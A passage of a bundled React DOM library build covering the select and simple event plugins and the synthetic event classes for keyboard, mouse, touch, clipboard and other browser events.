activeElementInst, nativeEvent, nativeEventTarget);\n\n    syntheticEvent.type = 'select';\n    syntheticEvent.target = activeElement;\n\n    EventPropagators.accumulateTwoPhaseDispatches(syntheticEvent);\n\n    return syntheticEvent;\n  }\n\n  return null;\n}\n\n/**\n * This plugin creates an `onSelect` event that normalizes select events\n * across form elements.\n *\n * Supported elements are:\n * - input (see `isTextInputElement`)\n * - textarea\n * - contentEditable\n *\n * This differs from native browser implementations in the following ways:\n * - Fires on contentEditable fields as well as inputs.\n * - Fires for collapsed selection.\n * - Fires after user input.\n */\nvar SelectEventPlugin = {\n  eventTypes: eventTypes,\n\n  extractEvents: function (topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n    if (!hasListener) {\n      return null;\n    }\n\n    var targetNode = targetInst ? ReactDOMComponentTree.getNodeFromInstance(targetInst) : window;\n\n    switch (topLevelType) {\n      // Track the input node that has focus.\n      case 'topFocus':\n        if (isTextInputElement(targetNode) || targetNode.contentEditable === 'true') {\n          activeElement = targetNode;\n          activeElementInst = targetInst;\n          lastSelection = null;\n        }\n        break;\n      case 'topBlur':\n        activeElement = null;\n        activeElementInst = null;\n        lastSelection = null;\n        break;\n      // Don't fire the event while the user is dragging. This matches the\n      // semantics of the native select event.\n      case 'topMouseDown':\n        mouseDown = true;\n        break;\n      case 'topContextMenu':\n      case 'topMouseUp':\n        mouseDown = false;\n        return constructSelectEvent(nativeEvent, nativeEventTarget);\n      // Chrome and IE fire non-standard event when selection is changed (and\n      // sometimes when it hasn't). IE's event fires out of order with respect\n      // to key and input events on deletion, so we discard it.\n      //\n      // Firefox doesn't support selectionchange, so check selection status\n      // after each key entry. The selection changes after keydown and before\n      // keyup, but we check on keydown as well in the case of holding down a\n      // key, when multiple keydown events are fired but only one keyup is.\n      // This is also our approach for IE handling, for the reason above.\n      case 'topSelectionChange':\n        if (skipSelectionChangeEvent) {\n          break;\n        }\n      // falls through\n      case 'topKeyDown':\n      case 'topKeyUp':\n        return constructSelectEvent(nativeEvent, nativeEventTarget);\n    }\n\n    return null;\n  },\n\n  didPutListener: function (inst, registrationName, listener) {\n    if (registrationName === 'onSelect') {\n      hasListener = true;\n    }\n  }\n};\n\nmodule.exports = SelectEventPlugin;\n},{\"123\":123,\"138\":138,\"147\":147,\"158\":158,\"20\":20,\"34\":34,\"62\":62,\"91\":91}],86:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar EventListener = _dereq_(137);\nvar EventPropagators = _dereq_(20);\nvar ReactDOMComponentTree = _dereq_(34);\nvar SyntheticAnimationEvent = _dereq_(87);\nvar SyntheticClipboardEvent = _dereq_(88);\nvar SyntheticEvent = _dereq_(91);\nvar SyntheticFocusEvent = _dereq_(92);\nvar SyntheticKeyboardEvent = _dereq_(94);\nvar SyntheticMouseEvent = _dereq_(95);\nvar SyntheticDragEvent = _dereq_(90);\nvar SyntheticTouchEvent = _dereq_(96);\nvar SyntheticTransitionEvent = _dereq_(97);\nvar SyntheticUIEvent = _dereq_(98);\nvar SyntheticWheelEvent = _dereq_(99);\n\nvar emptyFunction = _dereq_(144);\nvar getEventCharCode = _dereq_(111);\nvar invariant = _dereq_(152);\n\n/**\n * Turns\n * ['abort', ...]\n * into\n * eventTypes = {\n *   'abort': {\n *     phasedRegistrationNames: {\n *       bubbled: 'onAbort',\n *       captured: 'onAbortCapture',\n *     },\n *     dependencies: ['topAbort'],\n *   },\n *   ...\n * };\n * topLevelEventsToDispatchConfig = {\n *   'topAbort': { sameConfig }\n * };\n */\nvar eventTypes = {};\nvar topLevelEventsToDispatchConfig = {};\n['abort', 'animationEnd', 'animationIteration', 'animationStart', 'blur', 'canPlay', 'canPlayThrough', 'click', 'contextMenu', 'copy', 'cut', 'doubleClick', 'drag', 'dragEnd', 'dragEnter', 'dragExit', 'dragLeave', 'dragOver', 'dragStart', 'drop', 'durationChange', 'emptied', 'encrypted', 'ended', 'error', 'focus', 'input', 'invalid', 'keyDown', 'keyPress', 'keyUp', 'load', 'loadedData', 'loadedMetadata', 'loadStart', 'mouseDown', 'mouseMove', 'mouseOut', 'mouseOver', 'mouseUp', 'paste', 'pause', 'play', 'playing', 'progress', 'rateChange', 'reset', 'scroll', 'seeked', 'seeking', 'stalled', 'submit', 'suspend', 'timeUpdate', 'touchCancel', 'touchEnd', 'touchMove', 'touchStart', 'transitionEnd', 'volumeChange', 'waiting', 'wheel'].forEach(function (event) {\n  var capitalizedEvent = event[0].toUpperCase() + event.slice(1);\n  var onEvent = 'on' + capitalizedEvent;\n  var topEvent = 'top' + capitalizedEvent;\n\n  var type = {\n    phasedRegistrationNames: {\n      bubbled: onEvent,\n      captured: onEvent + 'Capture'\n    },\n    dependencies: [topEvent]\n  };\n  eventTypes[event] = type;\n  topLevelEventsToDispatchConfig[topEvent] = type;\n});\n\nvar onClickListeners = {};\n\nfunction getDictionaryKey(inst) {\n  // Prevents V8 performance issue:\n  // https://github.com/facebook/react/pull/7232\n  return '.' + inst._rootNodeID;\n}\n\nfunction isInteractive(tag) {\n  return tag === 'button' || tag === 'input' || tag === 'select' || tag === 'textarea';\n}\n\nvar SimpleEventPlugin = {\n  eventTypes: eventTypes,\n\n  extractEvents: function (topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n    var dispatchConfig = topLevelEventsToDispatchConfig[topLevelType];\n    if (!dispatchConfig) {\n      return null;\n    }\n    var EventConstructor;\n    switch (topLevelType) {\n      case 'topAbort':\n      case 'topCanPlay':\n      case 'topCanPlayThrough':\n      case 'topDurationChange':\n      case 'topEmptied':\n      case 'topEncrypted':\n      case 'topEnded':\n      case 'topError':\n      case 'topInput':\n      case 'topInvalid':\n      case 'topLoad':\n      case 'topLoadedData':\n      case 'topLoadedMetadata':\n      case 'topLoadStart':\n      case 'topPause':\n      case 'topPlay':\n      case 'topPlaying':\n      case 'topProgress':\n      case 'topRateChange':\n      case 'topReset':\n      case 'topSeeked':\n      case 'topSeeking':\n      case 'topStalled':\n      case 'topSubmit':\n      case 'topSuspend':\n      case 'topTimeUpdate':\n      case 'topVolumeChange':\n      case 'topWaiting':\n        // HTML Events\n        // @see http://www.w3.org/TR/html5/index.html#events-0\n        EventConstructor = SyntheticEvent;\n        break;\n      case 'topKeyPress':\n        // Firefox creates a keypress event for function keys too. This removes\n        // the unwanted keypress events. Enter is however both printable and\n        // non-printable. One would expect Tab to be as well (but it isn't).\n        if (getEventCharCode(nativeEvent) === 0) {\n          return null;\n        }\n      /* falls through */\n      case 'topKeyDown':\n      case 'topKeyUp':\n        EventConstructor = SyntheticKeyboardEvent;\n        break;\n      case 'topBlur':\n      case 'topFocus':\n        EventConstructor = SyntheticFocusEvent;\n        break;\n      case 'topClick':\n        // Firefox creates a click event on right mouse clicks. This removes the\n        // unwanted click events.\n        if (nativeEvent.button === 2) {\n          return null;\n        }\n      /* falls through */\n      case 'topDoubleClick':\n      case 'topMouseDown':\n      case 'topMouseMove':\n      case 'topMouseUp':\n      // TODO: Disabled elements should not respond to mouse events\n      /* falls through */\n      case 'topMouseOut':\n      case 'topMouseOver':\n      case 'topContextMenu':\n        EventConstructor = SyntheticMouseEvent;\n        break;\n      case 'topDrag':\n      case 'topDragEnd':\n      case 'topDragEnter':\n      case 'topDragExit':\n      case 'topDragLeave':\n      case 'topDragOver':\n      case 'topDragStart':\n      case 'topDrop':\n        EventConstructor = SyntheticDragEvent;\n        break;\n      case 'topTouchCancel':\n      case 'topTouchEnd':\n      case 'topTouchMove':\n      case 'topTouchStart':\n        EventConstructor = SyntheticTouchEvent;\n        break;\n      case 'topAnimationEnd':\n      case 'topAnimationIteration':\n      case 'topAnimationStart':\n        EventConstructor = SyntheticAnimationEvent;\n        break;\n      case 'topTransitionEnd':\n        EventConstructor = SyntheticTransitionEvent;\n        break;\n      case 'topScroll':\n        EventConstructor = SyntheticUIEvent;\n        break;\n      case 'topWheel':\n        EventConstructor = SyntheticWheelEvent;\n        break;\n      case 'topCopy':\n      case 'topCut':\n      case 'topPaste':\n        EventConstructor = SyntheticClipboardEvent;\n        break;\n    }\n    !EventConstructor ? \"development\" !== 'production' ? invariant(false, 'SimpleEventPlugin: Unhandled event type, `%s`.', topLevelType) : _prodInvariant('86', topLevelType) : void 0;\n    var event = EventConstructor.getPooled(dispatchConfig, targetInst, nativeEvent, nativeEventTarget);\n    EventPropagators.accumulateTwoPhaseDispatches(event);\n    return event;\n  },\n\n  didPutListener: function (inst, registrationName, listener) {\n    // Mobile Safari does not fire properly bubble click events on\n    // non-interactive elements, which means delegated click listeners do not\n    // fire. The workaround for this bug involves attaching an empty click\n    // listener on the target node.\n    // http://www.quirksmode.org/blog/archives/2010/09/click_event_del.html\n    if (registrationName === 'onClick' && !isInteractive(inst._tag)) {\n      var key = getDictionaryKey(inst);\n      var node = ReactDOMComponentTree.getNodeFromInstance(inst);\n      if (!onClickListeners[key]) {\n        onClickListeners[key] = EventListener.listen(node, 'click', emptyFunction);\n      }\n    }\n  },\n\n  willDeleteListener: function (inst, registrationName) {\n    if (registrationName === 'onClick' && !isInteractive(inst._tag)) {\n      var key = getDictionaryKey(inst);\n      onClickListeners[key].remove();\n      delete onClickListeners[key];\n    }\n  }\n};\n\nmodule.exports = SimpleEventPlugin;\n},{\"111\":111,\"126\":126,\"137\":137,\"144\":144,\"152\":152,\"20\":20,\"34\":34,\"87\":87,\"88\":88,\"90\":90,\"91\":91,\"92\":92,\"94\":94,\"95\":95,\"96\":96,\"97\":97,\"98\":98,\"99\":99}],87:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticEvent = _dereq_(91);\n\n/**\n * @interface Event\n * @see http://www.w3.org/TR/css3-animations/#AnimationEvent-interface\n * @see https://developer.mozilla.org/en-US/docs/Web/API/AnimationEvent\n */\nvar AnimationEventInterface = {\n  animationName: null,\n  elapsedTime: null,\n  pseudoElement: null\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticEvent}\n */\nfunction SyntheticAnimationEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticEvent.augmentClass(SyntheticAnimationEvent, AnimationEventInterface);\n\nmodule.exports = SyntheticAnimationEvent;\n},{\"91\":91}],88:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticEvent = _dereq_(91);\n\n/**\n * @interface Event\n * @see http://www.w3.org/TR/clipboard-apis/\n */\nvar ClipboardEventInterface = {\n  clipboardData: function (event) {\n    return 'clipboardData' in event ? event.clipboardData : window.clipboardData;\n  }\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticClipboardEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticEvent.augmentClass(SyntheticClipboardEvent, ClipboardEventInterface);\n\nmodule.exports = SyntheticClipboardEvent;\n},{\"91\":91}],89:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticEvent = _dereq_(91);\n\n/**\n * @interface Event\n * @see http://www.w3.org/TR/DOM-Level-3-Events/#events-compositionevents\n */\nvar CompositionEventInterface = {\n  data: null\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticCompositionEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticEvent.augmentClass(SyntheticCompositionEvent, CompositionEventInterface);\n\nmodule.exports = SyntheticCompositionEvent;\n},{\"91\":91}],90:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticMouseEvent = _dereq_(95);\n\n/**\n * @interface DragEvent\n * @see http://www.w3.org/TR/DOM-Level-3-Events/\n */\nvar DragEventInterface = {\n  dataTransfer: null\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticDragEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticMouseEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticMouseEvent.augmentClass(SyntheticDragEvent, DragEventInterface);\n\nmodule.exports = SyntheticDragEvent;\n},{\"95\":95}],91:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar PooledClass = _dereq_(25);\n\nvar emptyFunction = _dereq_(144);\nvar warning = _dereq_(159);\n\nvar didWarnForAddedNewProperty = false;\nvar isProxySupported = typeof Proxy === 'function';\n\nvar shouldBeReleasedProperties = ['dispatchConfig', '_targetInst', 'nativeEvent', 'isDefaultPrevented', 'isPropagationStopped', '_dispatchListeners', '_dispatchInstances'];\n\n/**\n * @interface Event\n * @see http://www.w3.org/TR/DOM-Level-3-Events/\n */\nvar EventInterface = {\n  type: null,\n  target: null,\n  // currentTarget is set when dispatching; no use in copying it here\n  currentTarget: emptyFunction.thatReturnsNull,\n  eventPhase: null,\n  bubbles: null,\n  cancelable: null,\n  timeStamp: function (event) {\n    return event.timeStamp || Date.now();\n  },\n  defaultPrevented: null,\n  isTrusted: null\n};\n\n/**\n * Synthetic events are dispatched by event plugins, typically in response to a\n * top-level event delegation handler.\n *\n * These systems should generally use pooling to reduce the frequency of garbage\n * collection. The system should check `isPersistent` to determine whether the\n * event should be released into the pool after being dispatched. Users that\n * need a persisted event should invoke `persist`.\n *\n * Synthetic events (and subclasses) implement the DOM Level 3 Events API by\n * normalizing browser quirks. Subclasses do not necessarily have to implement a\n * DOM interface; custom application-specific events can also subclass this.\n *\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {*} targetInst Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @param {DOMEventTarget} nativeEventTarget Target node.\n */\nfunction SyntheticEvent(dispatchConfig, targetInst, nativeEvent, nativeEventTarget) {\n  if (\"development\" !== 'production') {\n    // these have a getter/setter for warnings\n    delete this.nativeEvent;\n    delete this.preventDefault;\n    delete this.stopPropagation;\n  }\n\n  this.dispatchConfig = dispatchConfig;\n  this._targetInst = targetInst;\n  this.nativeEvent = nativeEvent;\n\n  var Interface = this.constructor.Interface;\n  for (var propName in Interface) {\n    if (!Interface.hasOwnProperty(propName)) {\n      continue;\n    }\n    if (\"development\" !== 'production') {\n      delete this[propName]; // this has a getter/setter for warnings\n    }\n    var normalize = Interface[propName];\n    if (normalize) {\n      this[propName] = normalize(nativeEvent);\n    } else {\n      if (propName === 'target') {\n        this.target = nativeEventTarget;\n      } else {\n        this[propName] = nativeEvent[propName];\n      }\n    }\n  }\n\n  var defaultPrevented = nativeEvent.defaultPrevented != null ? nativeEvent.defaultPrevented : nativeEvent.returnValue === false;\n  if (defaultPrevented) {\n    this.isDefaultPrevented = emptyFunction.thatReturnsTrue;\n  } else {\n    this.isDefaultPrevented = emptyFunction.thatReturnsFalse;\n  }\n  this.isPropagationStopped = emptyFunction.thatReturnsFalse;\n  return this;\n}\n\n_assign(SyntheticEvent.prototype, {\n  preventDefault: function () {\n    this.defaultPrevented = true;\n    var event = this.nativeEvent;\n    if (!event) {\n      return;\n    }\n\n    if (event.preventDefault) {\n      event.preventDefault();\n      // eslint-disable-next-line valid-typeof\n    } else if (typeof event.returnValue !== 'unknown') {\n      event.returnValue = false;\n    }\n    this.isDefaultPrevented = emptyFunction.thatReturnsTrue;\n  },\n\n  stopPropagation: function () {\n    var event = this.nativeEvent;\n    if (!event) {\n      return;\n    }\n\n    if (event.stopPropagation) {\n      event.stopPropagation();\n      // eslint-disable-next-line valid-typeof\n    } else if (typeof event.cancelBubble !== 'unknown') {\n      // The ChangeEventPlugin registers a \"propertychange\" event for\n      // IE. This event does not support bubbling or cancelling, and\n      // any references to cancelBubble throw \"Member not found\".  A\n      // typeof check of \"unknown\" circumvents this issue (and is also\n      // IE specific).\n      event.cancelBubble = true;\n    }\n\n    this.isPropagationStopped = emptyFunction.thatReturnsTrue;\n  },\n\n  /**\n   * We release all dispatched `SyntheticEvent`s after each event loop, adding\n   * them back into the pool. This allows a way to hold onto a reference that\n   * won't be added back into the pool.\n   */\n  persist: function () {\n    this.isPersistent = emptyFunction.thatReturnsTrue;\n  },\n\n  /**\n   * Checks if this event should be released back into the pool.\n   *\n   * @return {boolean} True if this should not be released, false otherwise.\n   */\n  isPersistent: emptyFunction.thatReturnsFalse,\n\n  /**\n   * `PooledClass` looks for `destructor` on each instance it releases.\n   */\n  destructor: function () {\n    var Interface = this.constructor.Interface;\n    for (var propName in Interface) {\n      if (\"development\" !== 'production') {\n        Object.defineProperty(this, propName, getPooledWarningPropertyDefinition(propName, Interface[propName]));\n      } else {\n        this[propName] = null;\n      }\n    }\n    for (var i = 0; i < shouldBeReleasedProperties.length; i++) {\n      this[shouldBeReleasedProperties[i]] = null;\n    }\n    if (\"development\" !== 'production') {\n      Object.defineProperty(this, 'nativeEvent', getPooledWarningPropertyDefinition('nativeEvent', null));\n      Object.defineProperty(this, 'preventDefault', getPooledWarningPropertyDefinition('preventDefault', emptyFunction));\n      Object.defineProperty(this, 'stopPropagation', getPooledWarningPropertyDefinition('stopPropagation', emptyFunction));\n    }\n  }\n});\n\nSyntheticEvent.Interface = EventInterface;\n\nif (\"development\" !== 'production') {\n  if (isProxySupported) {\n    /*eslint-disable no-func-assign */\n    SyntheticEvent = new Proxy(SyntheticEvent, {\n      construct: function (target, args) {\n        return this.apply(target, Object.create(target.prototype), args);\n      },\n      apply: function (constructor, that, args) {\n        return new Proxy(constructor.apply(that, args), {\n          set: function (target, prop, value) {\n            if (prop !== 'isPersistent' && !target.constructor.Interface.hasOwnProperty(prop) && shouldBeReleasedProperties.indexOf(prop) === -1) {\n              \"development\" !== 'production' ? warning(didWarnForAddedNewProperty || target.isPersistent(), \"This synthetic event is reused for performance reasons. If you're \" + \"seeing this, you're adding a new property in the synthetic event object. \" + 'The property is never released. See ' + 'https://fb.me/react-event-pooling for more information.') : void 0;\n              didWarnForAddedNewProperty = true;\n            }\n            target[prop] = value;\n            return true;\n          }\n        });\n      }\n    });\n    /*eslint-enable no-func-assign */\n  }\n}\n/**\n * Helper to reduce boilerplate when creating subclasses.\n *\n * @param {function} Class\n * @param {?object} Interface\n */\nSyntheticEvent.augmentClass = function (Class, Interface) {\n  var Super = this;\n\n  var E = function () {};\n  E.prototype = Super.prototype;\n  var prototype = new E();\n\n  _assign(prototype, Class.prototype);\n  Class.prototype = prototype;\n  Class.prototype.constructor = Class;\n\n  Class.Interface = _assign({}, Super.Interface, Interface);\n  Class.augmentClass = Super.augmentClass;\n\n  PooledClass.addPoolingTo(Class, PooledClass.fourArgumentPooler);\n};\n\nPooledClass.addPoolingTo(SyntheticEvent, PooledClass.fourArgumentPooler);\n\nmodule.exports = SyntheticEvent;\n\n/**\n  * Helper to nullify syntheticEvent instance properties when destructing\n  *\n  * @param {object} SyntheticEvent\n  * @param {String} propName\n  * @return {object} defineProperty object\n  */\nfunction getPooledWarningPropertyDefinition(propName, getVal) {\n  var isFunction = typeof getVal === 'function';\n  return {\n    configurable: true,\n    set: set,\n    get: get\n  };\n\n  function set(val) {\n    var action = isFunction ? 'setting the method' : 'setting the property';\n    warn(action, 'This is effectively a no-op');\n    return val;\n  }\n\n  function get() {\n    var action = isFunction ? 'accessing the method' : 'accessing the property';\n    var result = isFunction ? 'This is a no-op function' : 'This is set to null';\n    warn(action, result);\n    return getVal;\n  }\n\n  function warn(action, result) {\n    var warningCondition = false;\n    \"development\" !== 'production' ? warning(warningCondition, \"This synthetic event is reused for performance reasons. If you're seeing this, \" + \"you're %s `%s` on a released/nullified synthetic event. %s. \" + 'If you must keep the original synthetic event around, use event.persist(). ' + 'See https://fb.me/react-event-pooling for more information.', action, propName, result) : void 0;\n  }\n}\n},{\"144\":144,\"159\":159,\"160\":160,\"25\":25}],92:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticUIEvent = _dereq_(98);\n\n/**\n * @interface FocusEvent\n * @see http://www.w3.org/TR/DOM-Level-3-Events/\n */\nvar FocusEventInterface = {\n  relatedTarget: null\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticFocusEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticUIEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticUIEvent.augmentClass(SyntheticFocusEvent, FocusEventInterface);\n\nmodule.exports = SyntheticFocusEvent;\n},{\"98\":98}],93:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticEvent = _dereq_(91);\n\n/**\n * @interface Event\n * @see http://www.w3.org/TR/2013/WD-DOM-Level-3-Events-20131105\n *      /#events-inputevents\n */\nvar InputEventInterface = {\n  data: null\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticInputEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticEvent.augmentClass(SyntheticInputEvent, InputEventInterface);\n\nmodule.exports = SyntheticInputEvent;\n},{\"91\":91}],94:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticUIEvent = _dereq_(98);\n\nvar getEventCharCode = _dereq_(111);\nvar getEventKey = _dereq_(112);\nvar getEventModifierState = _dereq_(113);\n\n/**\n * @interface KeyboardEvent\n * @see http://www.w3.org/TR/DOM-Level-3-Events/\n */\nvar KeyboardEventInterface = {\n  key: getEventKey,\n  location: null,\n  ctrlKey: null,\n  shiftKey: null,\n  altKey: null,\n  metaKey: null,\n  repeat: null,\n  locale: null,\n  getModifierState: getEventModifierState,\n  // Legacy Interface\n  charCode: function (event) {\n    // `charCode` is the result of a KeyPress event and represents the value of\n    // the actual printable character.\n\n    // KeyPress is deprecated, but its replacement is not yet final and not\n    // implemented in any major browser. Only KeyPress has charCode.\n    if (event.type === 'keypress') {\n      return getEventCharCode(event);\n    }\n    return 0;\n  },\n  keyCode: function (event) {\n    // `keyCode` is the result of a KeyDown/Up event and represents the value of\n    // physical keyboard key.\n\n    // The actual meaning of the value depends on the users' keyboard layout\n    // which cannot be detected. Assuming that it is a US keyboard layout\n    // provides a surprisingly accurate mapping for US and European users.\n    // Due to this, it is left to the user to implement at this time.\n    if (event.type === 'keydown' || event.type === 'keyup') {\n      return event.keyCode;\n    }\n    return 0;\n  },\n  which: function (event) {\n    // `which` is an alias for either `keyCode` or `charCode` depending on the\n    // type of the event.\n    if (event.type === 'keypress') {\n      return getEventCharCode(event);\n    }\n    if (event.type === 'keydown' || event.type === 'keyup') {\n      return event.keyCode;\n    }\n    return 0;\n  }\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticKeyboardEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticUIEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticUIEvent.augmentClass(SyntheticKeyboardEvent, KeyboardEventInterface);\n\nmodule.exports = SyntheticKeyboardEvent;\n},{\"111\":111,\"112\":112,\"113\":113,\"98\":98}],95:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticUIEvent = _dereq_(98);\nvar ViewportMetrics = _dereq_(101);\n\nvar getEventModifierState = _dereq_(113);\n\n/**\n * @interface MouseEvent\n * @see http://www.w3.org/TR/DOM-Level-3-Events/\n */\nvar MouseEventInterface = {\n  screenX: null,\n  screenY: null,\n  clientX: null,\n  clientY: null,\n  ctrlKey: null,\n  shiftKey: null,\n  altKey: null,\n  metaKey: null,\n  getModifierState: getEventModifierState,\n  button: function (event) {\n    // Webkit, Firefox, IE9+\n    // which:  1 2 3\n    // button: 0 1 2 (standard)\n    var button = event.button;\n    if ('which' in event) {\n      return button;\n    }\n    // IE<9\n    // which:  undefined\n    // button: 0 0 0\n    // button: 1 4 2 (onmouseup)\n    return button === 2 ? 2 : button === 4 ? 1 : 0;\n  },\n  buttons: null,\n  relatedTarget: function (event) {\n    return event.relatedTarget || (event.fromElement === event.srcElement ? event.toElement : event.fromElement);\n  },\n  // \"Proprietary\" Interface.\n  pageX: function (event) {\n    return 'pageX' in event ? event.pageX : event.clientX + ViewportMetrics.currentScrollLeft;\n  },\n  pageY: function (event) {\n    return 'pageY' in event ? event.pageY : event.clientY + ViewportMetrics.currentScrollTop;\n  }\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticMouseEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticUIEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticUIEvent.augmentClass(SyntheticMouseEvent, MouseEventInterface);\n\nmodule.exports = SyntheticMouseEvent;\n},{\"101\":101,\"113\":113,\"98\":98}],96:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar SyntheticUIEvent = _dereq_(98);\n\nvar getEventModifierState = _dereq_(113);\n\n/**\n * @interface TouchEvent\n * @see http://www.w3.org/TR/touch-events/\n */\nvar TouchEventInterface = {\n  touches: null,\n  targetTouches: null,\n  changedTouches: null,\n  altKey: null,\n  metaKey: null,\n  ctrlKey: null,\n  shiftKey: null,\n  getModifierState: getEventModifierState\n};\n\n/**\n * @param {object} dispatchConfig Configuration used to dispatch this event.\n * @param {string} dispatchMarker Marker identifying the event target.\n * @param {object} nativeEvent Native browser event.\n * @extends {SyntheticUIEvent}\n */\nfunction SyntheticTouchEvent(dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget) {\n  return SyntheticUIEvent.call(this, dispatchConfig, dispatchMarker, nativeEvent, nativeEventTarget);\n}\n\nSyntheticUIEvent.augmentClass(SyntheticTouchEvent, TouchEventInterface);\n\nmodule.exports = SyntheticTouchEvent;\n},{\"113\":113,\"98\":98}],97:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All 